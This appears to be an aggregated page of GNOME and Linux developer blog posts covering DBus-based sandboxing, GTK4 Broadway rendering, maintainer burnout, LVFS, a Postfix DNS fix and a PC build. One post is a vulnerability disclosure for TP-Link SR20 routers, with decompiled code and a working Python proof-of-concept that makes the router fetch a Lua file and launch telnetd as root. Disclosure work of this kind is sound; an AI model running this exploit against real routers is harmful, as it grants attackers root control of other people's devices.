I’d like to use this design in more than just Builder but those applications are more demanding. They require passing FDs across the process boundary. (Also I’m sick of hand writing JSON RPCs and I don’t want to do that anymore).

Thankfully, we’ve had this great RPC system for years that fits the bill if you reuse the serialization format: DBus.

  • No ties to a DBus daemon
  • GDBus in GLib has a full implementation that plays well with async/sync code
  • gdbus-codegen can generate our RPC stubs and proxies
  • Well defined interfaces in XML files
  • Generated code does type enforcement to ensure contracts
  • We can easily pass FDs across the process boundary, useful for memfd/tmpfs/shm

To setup the sandboxes, we can use tools like flatpak-spawn or bwrap on Linux to restrict process capabilities before launching the target process. Stdin/stdout is left untouched so that we can communicate with the subprocess even after capabilities are dropped.

Before I (re)settled on DBus, I tried a number of other prototypes. That included writing an interface language/codegen for JSONRPC, using libvarlink, Thrift’s c_glib compiler and protobufs. I’m actually surprised I was happiest with the DBus implementation, but that’s how it goes sometimes.

While I don’t expect a lot of sandboxing around our Git support in Builder, I did use it as an opportunity to prototype what this multi-process design looks like. If you’re interested in checking it out, you can find the worker sources here.

What excites me about the future is how this type of design could be used to sandbox image loaders like GdkPixbuf. One could quite trivially have an RPC that passes a sealed memfd for compressed image contents and returns a memfd for the decoded framebuffer or pre-compressed GPU textures. Keep that process around a little while to avoid fork()/exec() overhead, and we gain a bit of robustness with very little performance drawbacks.

Alexander Larsson: Broadway adventures in Gtk4

Pre, 29/03/2019 - 4:20md

One of my long running side projects is a Gtk backend called “Broadway”. Instead of rendering to the screen this backend creates a HTTP server that you can connect to, and then exposes the UI remotely in the browser.

The original version of broadway was essentially streaming image frames, although there were various ways to optimize what got sent. This matches pretty well with how Gtk 3 rendering works, particularly on Wayland. Every frame it calls out to all widgets, letting them draw on top of a buffer and then sends the final frame to the compositor. Broadway just inserts some image delta computation and JavaScript magic in the middle of this.

Enter Gtk 4, breaking everything!

However, time moves on, and the current development branch of Gtk (which will be Gtk 4) has completely changed how rendering works, with the goal of doing efficient rendering on modern GPUs.

In the new model widgets don’t directly render to a buffer. Instead they build up a model of how the final result should look in terms of something called render nodes. These describe rendering as a tree of highlevel operations. The backend (we have software, OpenGL and Vulkan backends) then knows how to take this description and submit it to the GPU in an efficient way. This is somewhat similar to the firefox WebRender project.

Its would be possible to implement the broadway backend by hooking up the software renderer, letting it generate a buffer and then send that to the browser.  However, that is pretty lame!

CSS comes to the rescue!

Instead I’ve been looking at making the browser actually draw the render nodes. Gtk defines a lot of its UI in terms of CSS these days, and that means that the render nodes actually are very close to the CSS rendering model. For example, the basic drawing operation are things like rounded boxes with borders, shadows, etc.

So, I was thinking, could we not take these render node and turn them into actual DOM nodes with CSS styles and send them to the browser. Then every frame we can just diff the DOM trees, sending the minimal changes necessary.

Sounds crazy right? But, it turns out to work pretty well.

Check out this example page which I created with the magic of “save as”. In particular, try zooming into that page in the browser, and play with the developer tools inspector to see the nodes. Here is a part of it zoomed in:

The icons and the text are not CSS, so they don’t scale, but look at those gorgeous borders, shadows and gradients!

Entering the 3rd dimension!

Particularly interesting is the support in Gtk for general 3D transforms. This maps well to the CSS transform on the browser style.

Check out this example of a spinning-cube transition. If you open up the browser inspector you can see that each individual element in the cube is still a regular CSS box.

Some technical notes

If you look at the examples above they all use data: uris for images. This is a custom mode that lets “screenshots” like the above work. Normally broadway uses blobs for the images.

Also, looking at the examples they seem very heavy in terms of images, as all the text are images. However, in a typical frame most of the render tree is identical to the previous frame, meaning any label that was used in the last frame need not be sent again. In fact, even if it changes position in the tree due to a parent node changing (scrolling, cube-switching, etc) it can still be reused as-is.

However, text is clearly the weak point in here. Unfortunately HTML/CSS has no low-level text rendering APIs we could use. I’m considering generating a texture atlas with pre-rendered glyphs that can be reused (like CSS sprites) when rendering text, that would mean we will have to download less data at least. If anyone has other ideas I would love to hear about it.

Georges Basile Stavracas Neto: On Being a Free Software Maintainer

Pre, 29/03/2019 - 3:08pd

Year is 2013. I learn about a new, alpha-quality project called “GNOME Calendar.” Intriguing.

I like calendars.

“Cool, I’ll track that,” said my younger self. Heavy development was happening at the ui-rework branch. Every day, a few new commits. Pull, build, test. Except one day, no new commits. Nor the next day. Or week. Or month. Or year. I’m disappointed. Didn’t want that project to die. You know…

I like calendars.

“Nope. Not gonna happen,” also said my younger self. Clone, build, fix bugs, send patches. Maintainer’s interest in the project is renewed. We get a new icon, things get serious. We go to a new IRC room (!) and make the first public release of GNOME Calendar.

One year passes, it is now 2015. After contributing for more than a year, Erick made me the de facto GNOME Calendar maintainer ¹. A mix of positive emotions flows: proud of the achievement; excitement for being able to carry on with my ideas for the future of the application; fear, for the weight of the responsibility.

But heck, I am a free software maintainer now.

That was 4 years ago. Time passes, things happen, experience is built. Experience that differs from what I originally expected.

Being a free software maintainer is a funny place to find yourself in. Good things came from it. Bad things too. Also terrible. And weird.

Naturally, there is a strong sense of achievement when you, well, achieve maintainership of a project. Usually, getting there requires a large number of interactions during a long period of time. It means you are trusted. It means you are trustworthy. It means you are skilled enough.

It also usually means stronger community bonds. Getting to know excellent people, that know a lot and are willing to share and mentor and help, is a life-changing experience. There is a huge human value in being surrounded by great people.

For those of us who enjoy coding, hooray! Full plate. Planning releases, coding and doing reviews can be fun too. You will fix problems, find solutions, think and design your code. There is a plethora of problems to fix in this plane of existence, and you have the chance to independently fix a few of them by yourself.

And people. There are good people in this planet. You eventually will receive a thank you email, or you will be paid a coffee. One way or another, people find their way to you.

People really do find their way to you.

See, sometimes the software you maintain, well, it crashes. It may lose someone’s data. Someone may trigger a unique condition inside the code that you never managed to do. These people may get angry, sad, and frustrated ².

And they will find their way to you.

You will be demanded to fix your software. You will be shouted. Sometimes, the line may be crossed, and you will be abused. “How dare you not (use your free time to) fix this ultra high priority bug that is affecting me?” or “This is an absolutely basic feature! How is it not implemented yet (by you on your free time)?!” or even “You made me move to Software Y, and you need to win me back” are going to be realities you will have to face.

You may get emotional about your code. You may feel ashamed of what you did, and do. After all, your code has bugs, there are numerous issues opened at your bug tracker, and people are complaining non-stop. (Oh and, naturally, there will be someone who will try their best to put you down with that.)

At one point, you will look at your issue backlog and feel a subtle despair when realise you won’t ever be able to fix all the bugs.

If you are open to review other people’s contributions, there is a high change you will find challengers disguised as contributors. And your code review will be treated as an intellectual battle between good and evil. And you will need to explain and clarify over and over, and deal with circular logic, and pretty much any tool people might use to win battles instead of improving their code. And that is incredibly tiresome.

You will be told that you need to develop a thick skin. To ignore that, let it go, think positive and don’t pay attention to all the shit that is being thrown at you and why are you so goddamn negative you’re a maintainer for christ sake.

You may not feel the joy of working on what you work anymore. You may want to move on. You may also not do that due to the sense of responsibility that you have to your code, your community, and the people who use your software.

Unfortunately, being a free software maintainer may have a high price to your psychological and emotional health. 

Four years ago, I certainly did not know that.

¹ – And by “maintainer”, I am talking about being an upstream code maintainer, not package maintainer.
² – Rightfully so. Nobody wants to lose their stuff, or have their workflow broken.

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

Enj, 28/03/2019 - 11:20md
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) { int lua_State; char *remote_address; int err; int luaerr; char filename[64] char configFile[64]; char luaFile[64]; int attempts; char *payload; attempts = 4; memset(luaFile,0,0x40); memset(configFile,0,0x40); memset(filename,0,0x40); lua_State = luaL_newstart(); payload = iParm1 + 0xb027; if (payload != 0x00) { sscanf(payload,"%[^;];%s",luaFile,configFile); if ((luaFile[0] == 0) || (configFile[0] == 0)) { printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b); } else { remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4)); tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address); sprintf(filename,"/tmp/%s",luaFile); while (0 < attempts) { sleep(1); err = access(filename,0); if (err == 0) break; attempts = attempts + -1; } if (attempts == 0) { printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename); } else { if (lua_State != 0) { luaL_openlibs(lua_State); luaerr = luaL_loadfile(lua_State,filename); if (luaerr == 0) { luaerr = lua_pcall(lua_State,0,0xffffffff,0); } lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr); lua_pushstring(lua_State,configFile); lua_pushstring(lua_State,remote_address); lua_call(lua_State,2,1); } lua_close(lua_State); } } } } Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:#!/usr/bin/python3 # Copyright 2019 Google LLC. # SPDX-License-Identifier: Apache-2.0 # Create a file in your tftp directory with the following contents: # #function config_test(config) # os.execute("telnetd -l /bin/login.sh") #end # # Execute script as poc.py remoteaddr filename import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) argument = "%s;arbitrary" % sys.argv[2] packet = packet + argument.encode() sock_send.sendto(packet, (sys.argv[1], port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r)
[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comments

Richard Hughes: New AppStream Validation Requirements

Enj, 28/03/2019 - 5:36md

In the next release of appstream-glib the appstream-util validate requirements got changed, which might make your life easier, or harder — depending if you already pass or fail the validation. The details are here but the rough jist is that we’ve relaxed a lot of the style rules (e.g. starts with a capital letter, ends with a full stop, less than a certain number of chars, etc), and made stricter some of the more important optional parts of the specification. For instance, requiring <content_rating> for any desktop or console application.

Even if you don’t care upstream, the new validation will soon be turned on for any apps built in Flathub, and downstream “packagers” will be pestering you for details as updates are now failing. Although only a few apps fail, some of the missing metadata tags are important enough to fail building. To test your app right now with the new validator:

$ flatpak remote-add --if-not-exists gnome-nightly https://sdk.gnome.org/gnome-nightly.flatpakrepo $ flatpak install gnome-nightly org.gnome.Sdk $ flatpak run --command=bash --filesystem=home:ro org.gnome.Sdk//master # appstream-util validate /home/hughsie/Code/gnome-software/data/appdata/org.gnome.Software.appdata.xml.in # exit

Of course, when the next tarball is released it’ll be available in your distribution as normal, but I wanted to get some early sanity checks in before I tag the release.

Christian Schaller: LVFS adopted by Linux Foundation

Enj, 28/03/2019 - 3:50md

Today the announcement went out that the Linux Vendor Firmware Service has become and official Linux Foundation service. For those that don’t know it yet LVFS is a service that provides firmware for your linux running hardware and it was one off our initial efforts as part of the Fedora Workstation effort to drain the swamp in terms of making Linux a first class desktop operating system.

The effort came about due to Peter Jones, who is Red Hats representative to the UEFI standards body, approaching me to talk about how Microsoft was trying to push for a standardized way to ship UEFI firmware for Windows and how UEFI being a standard openeded a path for us to actually get full support for this without each vendor having to ship and maintain their own proprietary firmware tools. So we did a meeting with Peter Jones and also brought in Richard Hughes who had already been looking at the problem of firmware updates in Linux, partly due to his ColorHug hardware, and the effort got started with Peter working on the low level OS tooling and Richard taking on building the service to drive distribution and the work to integrate it all into GNOME Software. One concern we had of course was if we could reach critical mass for this and get vendors interested, but luckily Dell was just as keen on improving firmware handling under Linux as us and signed on from the start. Having Dell onboard helped give the effort a lot of credibility and as the service matured we ended up having more and more vendors sign up. We also reached out through Red Hats partnerships to push vendors to adopt supporting it. As Richard also mentions in his interview about it, we had made the solution as similar to Microsofts as possible to decrease the threshold for hardware vendors to join, the goal being that if they did the basic work to support Windows they could more or less just ship the same firmware file to LVFS.

One issue that we had gone back on forth about inside Red Hat was the formal setup of the service. While we all agreed the service was hugely beneficial it felt like something that should be a shared service for all of Linux and we felt that if the service was Red Hat provided it might dissuade other vendors to join. So we started looking around for a neutral place to land the service while in the meantime LVFS had a sort of autonomous status being run as a community effort by Richard Hughes. We ended up talking to Chris Wright, the Red Hat CTO, about the project and he offered to facilitate contact with the Linux Foundation. The initial meetings was very positive and the Linux Foundation seemed interested in running the service right from the start, it did end up taking us quite some time to clear all formal and technical hurdles to get there, but I for one is very happy to see the LVFS now being a vendor neutral service provided by the Linux Foundation.

So a big thank you to Richard Hughes, Peter Jones, Chris Wright, Mario Limonciello and Dell and the Linux Foundation for their help in getting us here. And also a big thank you to Fedora and the Fedora community for their help with providing us a place to develop and polish up this service to the benefit of all. To me this is one of many examples of how Fedora keeps innovating and leading the way on Desktop linux.

Ismael Olea: Postfix: Name service error for name=domain.com type=MX: Host not found, try again

Enj, 28/03/2019 - 3:26md

I tried to post this in Serverfault but I couldn’t since it’s blocked by their spam detector.

Here is the full text of my question:

Hi:

I’m stuck with a Postfix MX related problem.

I’ve just migrated a very old Centos 5 server to v7 so I’m using postfix-2.10.1-7.el7.x86_64. I’ve upgraded the legacy postfix configuration (maybe the cause of this hell) and other supplementary stuff which seems to work:

  • postfix-perl-scripts-2.10.1-7.el7.x86_64
  • postgrey-1.34-12.el7.noarch
  • amavisd-new-2.11.1-1.el7.noarch
  • spamassassin-3.4.0-4.el7_5.x86_64
  • perl-Mail-SPF-2.8.0-4.el7.noarch
  • perl-Mail-DKIM-0.39-8.el7.noarch
  • dovecot-2.2.36-3.el7.x86_64

After many tribulations I think I got most of the system running except the annoying MX related problems, as (from /var/log/maillog):

Mar 28 14:26:48 tormento postfix/smtpd[1021]: warning: Unable to look up MX host for spmailtechn.com: Host not found, try again Mar 28 14:26:51 tormento postfix/smtpd[1052]: warning: Unable to look up MX host for inlumine.ual.es: Host not found, try again Mar 28 14:31:38 tormento postfix/smtpd[1442]: warning: Unable to look up MX host for aol.com: Host not found, try again Mar 28 13:07:53 tormento postfix/smtpd[26556]: warning: Unable to look up MX host for hotmail.com: Host not found, try again Mar 28 13:12:06 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for facebookmail.com: Host not found, try again Mar 28 13:12:31 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for joker.com: Host not found, try again Mar 28 13:13:02 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for bounce.linkedin.com: Host not found, try again

and:

Mar 28 14:50:36 tormento postfix/smtp[1700]: 7B6C69C6A2: to=<ismael.olea@gmail.com>, orig_to=<ismael@olea.org>, relay=none, delay=1142, delays=1142/0.07/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=gmail.com type=MX: Host not found, try again) Mar 28 14:32:05 tormento postfix/smtp[1383]: 721A19C688: to=<XXXXX@yahoo.com>, orig_to=<XXXX@olea.org>, relay=none, delay=4742, delays=4742/0/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=yahoo.com type=MX: Host not found, try again)

as examples.

The first suspect is DNS resolution but this is working both using Hetztner DNS servers (where machine is host) or 8.8.8.8 or 9.9.9.9:

$ dig mx gmail.com ; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx gmail.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20330 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;gmail.com. IN MX ;; ANSWER SECTION: gmail.com. 3014 IN MX 10 alt1.gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 5 gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 40 alt4.gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 20 alt2.gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 30 alt3.gmail-smtp-in.l.google.com. ;; Query time: 1 msec ;; SERVER: 213.133.100.100#53(213.133.100.100) ;; WHEN: jue mar 28 14:56:00 CET 2019 ;; MSG SIZE rcvd: 161

or:

dig mx inlumine.ual.es ; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx inlumine.ual.es ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38239 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;inlumine.ual.es. IN MX ;; ANSWER SECTION: inlumine.ual.es. 172800 IN MX 1 ASPMX.L.GOOGLE.COM. inlumine.ual.es. 172800 IN MX 10 ASPMX3.GOOGLEMAIL.COM. inlumine.ual.es. 172800 IN MX 10 ASPMX2.GOOGLEMAIL.COM. inlumine.ual.es. 172800 IN MX 5 ALT1.ASPMX.L.GOOGLE.COM. inlumine.ual.es. 172800 IN MX 5 ALT2.ASPMX.L.GOOGLE.COM. ;; AUTHORITY SECTION: inlumine.ual.es. 172800 IN NS dns.ual.es. inlumine.ual.es. 172800 IN NS alboran.ual.es. ;; Query time: 113 msec ;; SERVER: 213.133.100.100#53(213.133.100.100) ;; WHEN: jue mar 28 14:56:51 CET 2019 ;; MSG SIZE rcvd: 217

my main.cf:

$ postconf -n address_verify_sender = postmaster@olea.org alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases body_checks = regexp:/etc/postfix/body_checks.regexp broken_sasl_auth_clients = yes canonical_maps = hash:/etc/postfix/canonical command_directory = /usr/sbin config_directory = /etc/postfix content_filter = smtp-amavis:[127.0.0.1]:10024 daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5 header_checks = pcre:/etc/postfix/header_checks.pcre home_mailbox = Maildir/ html_directory = no inet_interfaces = all inet_protocols = ipv4 local_recipient_maps = proxy:unix:passwd.byname $alias_maps mail_owner = postfix mailbox_command = /usr/bin/procmail -a "$EXTENSION" mailbox_size_limit = 200000000 mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man message_size_limit = 30000000 mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain, tormento.olea.org, /etc/postfix/localdomains myhostname = tormento.olea.org newaliases_path = /usr/bin/newaliases.postfix policy_time_limit = 3600 queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.10.1/README_FILES recipient_delimiter = + sample_directory = /usr/share/doc/postfix-2.10.1/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtp_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem smtp_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem smtp_tls_mandatory_protocols = !SSLv2,!SSLv3 smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtpd_helo_required = yes smtpd_recipient_restrictions = permit_mynetworks check_client_access hash:/etc/postfix/access permit_sasl_authenticated reject_non_fqdn_recipient reject_non_fqdn_sender reject_rbl_client cbl.abuseat.org reject_rbl_client dnsbl-1.uceprotect.net reject_rbl_client zen.spamhaus.org reject_unauth_destination check_recipient_access hash:/etc/postfix/roleaccount_exceptions reject_multi_recipient_bounce check_helo_access pcre:/etc/postfix/helo_checks.pcre reject_non_fqdn_hostname reject_invalid_hostname check_sender_mx_access cidr:/etc/postfix/bogus_mx.cidr check_sender_access hash:/etc/postfix/rhsbl_sender_exceptions check_policy_service unix:postgrey/socket permit smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = $myhostname, olea.org, cacharreo.club smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem smtpd_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem smtpd_tls_loglevel = 1 smtpd_tls_mandatory_protocols = TLSv1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev:/dev/urandom transport_maps = hash:/etc/postfix/transport unknown_local_recipient_reject_code = 550 virtual_maps = hash:/etc/postfix/virtual

and my master.cf:

$ postconf -M smtp inet n - n - - smtpd submission inet n - n - - smtpd -o smtpd_tls_security_level=may -o smtpd_sasl_auth_enable=yes -o cleanup_service_name=cleanup_submission -o content_filter=smtp-amavis:[127.0.0.1]:10023 smtps inet n - n - - smtpd -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes pickup unix n - n 60 1 pickup cleanup unix n - n - 0 cleanup qmgr unix n - n 300 1 qmgr tlsmgr unix - - n 1000? 1 tlsmgr rewrite unix - - n - - trivial-rewrite bounce unix - - n - 0 bounce defer unix - - n - 0 bounce trace unix - - n - 0 bounce verify unix - - n - 1 verify flush unix n - n 1000? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - n - - smtp relay unix - - n - - smtp -o fallback_relay= showq unix n - n - - showq error unix - - n - - error retry unix - - n - - error discard unix - - n - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - n - - lmtp anvil unix - - n - 1 anvil scache unix - - n - 1 scache smtp-amavis unix - - n - 2 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20 127.0.0.1:10025 inet n - n - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks,reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o mynetworks_style=host -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks policy unix - n n - 2 spawn user=nobody argv=/usr/bin/perl /usr/share/postfix/policyd-spf-perl

I fear I’m missing something really obvious but I’ve been googling for two days doing any amount of tests and now I don’t know what much to do.

Thanks in advance.

Post data:

Well, this is embarrassing. As I predicted my problem was caused by the most obvious and trivial reason: lack of read access to /etc/resolv.conf for the postfix user o_0

As you probably know the postfix subproceses (smtp, smtpd, qmgr, etc) runs with the postfix user. All the comments and suggestion I’ve received has been related with problems accessing to DNS resolving data and the usual suspects has been SELinux or a chrooted postfix. You all were right in the final reason. Following an advice and tried:

# sudo -u postfix -H cat /etc/resolv.conf cat: /etc/resolv.conf: Permission denied

So… What??

# ls -l /etc/resolv.conf -rw-r-----. 1 root named 118 mar 28 20:34 /etc/resolv.conf

OMG!… then after a chmod o+r and restarting Postfix all the email on hold can be processed and sent and new mail is processed as expected.

I doubt I’ve changed the resolv.conf reading permissions but I can’t be 100% sure. So finally the problem is fixed and I’m very sorry for stole the attention of all of you for this ridiculous reason.

Thanks you all.

Andre Klapper: Updating some GNOME 3.32 user documentation

Enj, 28/03/2019 - 4:51pd

Apart from replacing many broken links to git.gnome.org or replacing links to GNOME Bugzilla with links to GNOME Gitlab in many code repositories and wiki pages, in the last months I spent some good time updating random GNOME user docs all over the place:

  • The user docs for Rhythmbox 3.4.3, GNOME Chess 3.32, five-or-more 3.32 and four-in-a-row 3.32 should be up-to-date.
  • The Totem 3.32 user documentation is up-to-date and now in Mallard format, based on work started in 2013 by Magda and Kat.
  • The screenshots in the user help of gnome-klotski, simple-scan, swell-foop, tali, and zenity are up-to-date.
  • Updated hopefully all places which mentioned an application menu now replaced by a menu button.
  • Removed a bunch of unused help images from some repositories shipped for no reason and bloating tarballs.

Enjoy and check the GNOME Wiki if you are interested in working on user documentation!

Olav Vitters: New computer

Enj, 28/03/2019 - 12:50pd

Shortly after I assembled my current/old pc the older pc died. I intended to have two and ended up with only one; my NUC. With memory prices slowly dropping to more affordable levels I decided to assemble a new pc.  I tried to go for components with a good price/performance. I don’t want to spend 50% more for maybe 10% more performance. Next to price/performance I opted for an AMD CPU because Intel has so many more security issues. I went with a 1TB SSD (SATA because of price/performance), 65W TDP AMD Ryzen with integrated GPU, a mini-ITX size motherboard with good 5.1+ sound, plus a fanless case. PSU wise I found a laptop-like PSU/charger which needed a DC-DC converter. The result is an utterly quiet pc. I did a stress test and checked the temperatures. Everything seems ok, though wonder how things will be during summer. I quite like the lack of any noise.
My existing older pc is a NUC with a slowly spinning fan. I noticed a company making fanless cases for pretty much all NUC models. I’m wondering whether to make my existing NUC fanless, or maybe do something else.

Installing Mageia was annoying. Latest stable didn’t work, latest beta same. Eventually ended up installing it via internet (net install).

Before buying all the components I wasn’t aware something like fanless existed for such a CPU. It’s nice to do the research and make a pc which mostly follows the  tips  I found, my preferences and the trade-offs I had to make. Price wise I spent about 800 EUR on the various components (I didn’t list all of them). In case people want to know the exact components I’ll put it into the comments (update: had to put it under the “more” link). I’m trying to avoid making this appear as an advertisement.

I’m going to link to a Dutch price comparison website for most items.

    • CPU: AMD Ryzen 5 2400G Boxed
      In Q2/Q3 2019 AMD will release newer Ryzen CPU’s. I stopped caring about getting the latest each time.
    • Motherboard: ASRock Fatal1ty B450 Gaming-ITX/ac
    • Case: Streacom FC8 Alpha Fanless (without space for CD/DVD/Blueray reader)
    • Memory: G.Skill Aegis F4-3000C16D-32GISB
      This memory arrives without a heat sink. I bought 2 types of heat sinks from AliExpress. They’re still to arrive so haven’t listed them yet. A heat sink might not be needed but I rather be careful.
    • SSD (M.2 format using SATA): Crucial MX500 m.2 1TB
    • Pico PSU: Mini-box picoPSU-150-XT
      I bought this for 42.50 EUR incl shipping, current price is way higher. You’ll probable want to search around for better prices. I wasn’t sure if to get 150 Watt or the 120 Watt version. I noticed some people reporting stability problems with 120 Watt, though that could be due to heat instead of power. The integrated GPU can be power hungry; I doubt I’ll ever use something GPU intense.
    • Power supply: Leicke ULL PSU Power Supply 150W
      This is significantly cheaper on Amazon UK than Amazon DE. For me the UK one came with a EU power outlet and was sent quickly from Germany. I was expecting to get a UK power outlet and then use a spare ‘monitor’ cable to make it work.
    • Better thermal compound: ARCTIC MX-4 2019 Edition – 8 gram
      Use keepa.com plugin for your browser to compare the prices across Amazon sites. Amazon was cheaper than any price comparison site.
    • ATX 90 degree power adapter: Mainboard Motherboard ATX 24Pin to 24Pin 90 Degree Power Adapter Connector
      This bit hasn’t arrived yet. I added this to ensure there is more space between the memory and the pico psu (both sources of heat). Further, the internal USB3 cable from the case is very sturdy. Turning the pico psu 90 degrees will help with that internal USB3 cable, plus optimize heat dissipation.
    • Internal USB3 90 degree adapter: USB 3.0 20pin Male to Female Extension Adapter Angled 90 Degree for Motherboard Mainboard
      Similar to the ATX 90 degree adapter. This is solely meant for making it easier to connect that sturdy internal USB3 cable.
    • M.2 heatsink: Pure Copper Cooling M.2 NGFF 2260 Solid Hard Disk Cooler Heat Sink
      I wanted this due to remarks that a M.2 SSD could run quite hot, combined with the lack of airflow in the case (as it’s fanless). It’s only a few EUR and I wanted to be on the safe side.
      Note: It’s tiny! Despite being for M.2 it’s smaller (5cm wide) than expected. I’m still not entirely sure if it’s needed.

     

    General tips:

    • The power supply and the pico psu/DC-DC converter aren’t 100% efficient. Meaning, 150 Watt from the power supply will be less when it arrives at the pico psu. Same for when it arrives in the mother board. On the other hand, power supplies are really inefficient if they’re underutilized. Meaning, if you only run it at 50% performance the power supply and convertor will waste a lot of power. Make sure to pay attention that the voltages are all ok. Meaning: that everything accepts the same voltage (12 or 19 Volts seems to be common).
    • AliExpress and Ebay have a lot of questionable Pico PSU/DC-DC converters. They’re cheap, but the reviews made me question buying those. I noticed a lot of sites reselling the AliExpress ones under various brands. Make sure to recognize those AliExpress ones. See for instance the ones sold by RGeek store.
    • I bought 20 grams of thermal paste due to a) better heat transfer than the one which came with the case b) a comment that there isn’t enough thermal paste with the case. The case came with (I think) 2x 10 grams. I’m pretty sure 8 grams would be enough and I applied it generously. If you get a less power hungry CPU then stick with the one from the case; it’s pretty good as well from reading the specification. Spec showed 5W/m.K, the one I have is around 8.5W/m.K.
